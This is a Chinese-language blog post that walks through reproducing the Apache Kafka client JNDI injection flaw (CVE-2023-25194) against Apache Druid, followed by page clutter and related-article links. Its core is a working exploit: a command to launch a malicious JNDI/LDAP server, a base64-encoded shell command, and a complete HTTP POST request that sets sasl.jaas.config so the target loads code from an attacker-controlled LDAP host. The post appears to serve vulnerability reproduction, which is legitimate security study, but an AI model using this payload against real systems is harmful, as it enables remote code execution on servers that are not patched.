Apache Kafka 客户端 JNDI 注入 RCE (CVE-2023-25194)

最新推荐文章于 2024-05-21 15:14:01 发布
最新推荐文章于 2024-05-21 15:14:01 发布
阅读量135 收藏 3
点赞数 6
分类专栏: apache漏洞 文章标签: apache kafka 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136373199
版权

pache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。

在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。

Apache Druid 的主页:

 

首先,使用 JNDIExploit 启动一个恶意的JNDI 服务器:

java -jar .\JNDIExploit-1.1-SNAPSHOT.jar -i 192.168.92.135 -u

要执行的命令id > /tmp/success   base64编码后为aWQgPiAvdG1wL3N1Y2Nlc3M=

 构造payload:ldap://192.168.126.130:1389/Basic/Command/Base64/aWQgPiAvdG1wL3N1Y2Nlc3M=

 发包:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 192.168.92.130:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1792

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.92.135:1389/Basic/Command/Base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"test",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

已成功执行:id > /tmp/success

青梅fox
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Kafka 3.0.0 (kafka-3.0.0-src.tgz)
02-17
Apache Kafka 3.0.0 (kafka-3.0.0-src.tgz源代码) 是一个开源分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和关键任务应用程序。
Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194) vulhub复现
qq_53003652的博客
07-14 885
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。可以看到lm_hacker文件被成功创建(hacker是测试过的)启动kali:192.168.126.128。发送数据包,回到靶机,进入漏洞目录下。
修复 Apache Kafka 中的远程代码执行漏洞CVE-2023-25194
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-30 741
Kafka Connect 中发现可能的 RCE 和拒绝服务问题。更新 阿帕奇软件基金会 (ASF) 已解决了一个漏洞,该漏洞可被利用来使用 Kafka Connect 发起远程代码执行 (RCE) 攻击。该关键漏洞于 2 月 8 日公布,被追踪为 CVE-2023-25194Apache Kafka Connect 是 Apache Kafka 的一个免费开源组件,是系统、数据库和键值存储之间数据集成的中心枢纽。
Apache Kafka 漏洞 【CVE-2023-25194】说明及解决建议
EdwardWang_的博客
02-10 9800
Apache Kafka 漏洞 【CVE-2023-25194】说明 及 解决建议
[CVE-2023-25194] 开源流处理平台Kafka JNDI注入漏洞
追光者的博客
03-12 424
[CVE-2023-25194] 开源流处理平台Kafka JNDI注入漏洞
Apache Kafka 2.8.1(kafka_2.12-2.8.1.tgz)
02-17
Apache Kafka 2.8.1(Scala 2.12 :kafka_2.12-2.8.1.tgz) 是一个开源分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和关键任务应用程序。) 是一个开源分布式事件流平台,被数千家公司用于高...
Apache Kafka 3.1.0 (kafka-3.1.0-src.tgz)
02-16
Apache Kafka 3.1.0 (kafka-3.1.0-src.tgz源代码) 是一个开源分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和关键任务应用程序。
Apache Kafka 3.1.0 (kafka_2.12-3.1.0.tgz)
02-17
Apache Kafka 3.1.0 (Scala 2.12 :kafka_2.12-3.1.0.tgz) 是一个开源分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和关键任务应用程序。) 是一个开源分布式事件流平台,被数千家公司用于高...
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析
蚁景网安学院
03-23 561
Apache Kafka是一个开源的分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。
Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
0xSec
03-18 6081
Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。
CVE-2023-25194 Kafka JNDI 注入分析
蚁景网安学院
11-09 726
Apache Kafka Clients Jndi Injection漏洞描述Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect wor...
Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
qq_40646572的博客
05-14 1915
2、无法升级的用户可通过验证Kafka Connect连接器配置,仅允许受信任的JNDI配置来缓解此漏洞。在该功能中,将payload填写到Consumer properties属性值中即可。在payload提交前,请先在vps机器中开启ldap服务。在Load data功能页中的Streaming功能中。我是通过vulhub下载的环境,下载后直接启动即可。打开页面,漏洞点在Load data功能页中。使用低版本的jdk中的ldap服务即可。
【已复现】Apache Kafka Connect JNDI注入漏洞(CVE-2023-25194)安全风险通告
smellycat000的专栏
02-09 3918
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告Kafka Connect是一种用于在Apache Kafka和其他系统之间可扩展且可靠地流式传输数据的工具。它使快速定义将大量数据移入和移出Kafka的连接器变得简单。Kafka Connect可以摄取整个数据库或从所有应用程序服务器收集指标到Kafka主题中,使数据可用于低延迟的流处理。近日,奇安信CERT监测到A...
apache BeanUtils
w_t_y_y的博客
05-20 51
一、populate
在Linux中通过ansible自动化部署apache服务
最新发布
mengmeng_921的博客
05-21 645
周六:网络CCNA+HCIA=线上直播/线下面授——同步上课周日:网络CCNP+HCIP=线上直播/线下面授——同步上课周六:系统 RHCE=线上直播/线下面授——同步上课周日:系统 RHCA=线上直播/线下面授——同步上课。
Angular前端项目在Apache httpd服务器上的部署
hhujjj2005的博客
05-14 334
Tomcat是一个Java Servlet容器,用于运行Java Servlet和JavaServer Pages(JSP),而Apache HTTP服务器是一个通用的Web服务器,用于提供静态和动态内容。yum安装,安装简单,最新版本,本文用的yum安装。源代码安装,可以安装任何版本,配置灵活性比较高,但是安装麻烦。
Apache Doris 2.0.10 版本正式发布
SelectDB
05-17 395
亲爱的社区小伙伴们,版本已于 2024 年 5 月 15 日正式与大家见面,该版本提交了 83 个改进项以及问题修复,进一步提升了系统的性能及稳定性,欢迎大家下载体验。
SpringBoot和Apache Doris实现实时广告推荐系统
qq_30895747的博客
05-21 127
基于SpringBoot的实时广告推送系统
CVE-2023-3519
07-27
- *2* *3* [Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析](https://blog.csdn.net/qq_38154820/article/details/129731587)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值